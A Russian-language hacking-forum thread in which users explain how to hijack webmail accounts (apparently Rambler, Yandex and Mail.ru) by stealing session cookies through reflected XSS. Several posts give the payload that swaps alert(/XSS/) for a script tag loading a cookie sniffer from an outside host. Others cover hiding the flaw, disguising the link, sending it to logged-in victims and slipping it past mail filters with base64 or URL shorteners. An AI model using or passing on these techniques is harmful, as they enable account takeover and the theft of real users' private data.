ANTICHAT - Взлом мы с кражей кукис.

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Взлом мы с кражей кукис. (https://forum.antichat.xyz/showthread.php?t=8034595)

есть xss...ты к ней добавляешь скрипт кражы куков..отправляшь жертве...куки приходят..ты их меняешь..и вуаля

а какой скрипт послать что-бы жертва повелась?

Цитата:

Сообщение от vonkolot

есть xss...ты к ней добавляешь скрипт кражы куков..отправляшь жертве...куки приходят..ты их меняешь..и вуаля

Значит есть xss

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):

У вас нет прав чтобы видеть скрытый текст, который находится здесь

заместо скрипа алерта вставляем скрипт кражи %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>" это с здешнешго онлайн снифера,так?

дальше маскировка и отправка жертве, которая должна быть авторизована и открывать она должна непосредственно с рамблера. Все верно?

Цитата:

Сообщение от cerega1999

а какой скрипт послать что-бы жертва повелась?

Во первых не скрипт а xss а скрипт к xss дописывать..выше есть линк на тему про xss,там почитаешь,все поймешь!:hmcool:

Добавлено через 1 минуту

Цитата:

Сообщение от LogaN4ik

Значит есть xss
http://******************/?sum=56&years=6546&interest=">alert(/XSS/)

заместо скрипа алерта вставляем скрипт кражи %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>" это с здешнешго онлайн снифера,так?

http://********************/?sum=56&years=6546&interest="> после этого да? дальше маскировка и отправка жертве, которая должна быть авторизована и открывать она должна непосредственно с рамблера. Все верно?

во первых на саму xss быстренько хайд ставишь,а то прикроют!!! а вместо alert(/XSS/) пишешь %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>"

Цитата:

Сообщение от cerega1999

а какой скрипт послать что-бы жертва повелась?

Читай это >>> https://hpc.name/showthread.php?t=13808 тут всё очень подробно описано. Не пойму как это нельзя понимать!

Цитата:

Сообщение от vonkolot

во первых на саму xss быстренько хайд ставишь,а то прикроют!!! а вместо alert(/XSS/) пишешь %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>"

Оке поставил. дальше все верно ?

Добавлено через 1 час 38 минут
Как сделать чтобы мэил не отвергал мое письмл с сылкой? я в бэйс 64 шифровал и делал миниссылку и третим способом..

Цитата:

Сообщение от vonkolot

Во первых не скрипт а xss а скрипт к xss дописывать..выше есть линк на тему про xss,там почитаешь,все поймешь!:hmcool:

Добавлено через 1 минуту

во первых на саму xss быстренько хайд ставишь,а то прикроют!!! а вместо alert(/XSS/) пишешь %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>"

http://httpz.ru/wn05gmtt78go.js
вместо этого он должен поставить свой алиасс а не твой

Цитата:

Сообщение от Vladimir1994

http://httpz.ru/wn05gmtt78go.js
вместо этого он должен поставить свой алиасс а не твой

Это не мой алиас,а ТС'а

Сорри за название чтото потярялись буквы в слове МЫЛО

Прочитал уже кучу тем, и пересмотрел видосы но так и ненашел ответа+(
сперва пробывал просто ставить в строку скрипт, все нормально,
но при отправке жертве на мыло прямой ссылки на картинку со снифером, Почта ее не пропускает и возвращает мне обратно.

Попробывал шифровать ссылку сперва через тиниюрл и отправить, письмо отослалось снифер чтото разнюхал но квери нет..
При попытки кодировки ссылки на картинку в бейс 64 у меня открывается не картинка а текст названия картинки чтоли,забыл=), но куки не приходят..
а при способе 3 у меня вообще не изменяется ссылка..
все читал сдесь и смотрел виедео. https://hpc.name/showthread.php?t=13808
Попытался искать пассив на мэиле янде. рамбле. но так и не смог найти а база с ними мне не доступна.

ПОдскажите что я мож не так делаю, как мне быть то?
так

мыло скриптом кражей куков не взломаешь...ищи xss или покупай...и ломай..так же есть еще много методов!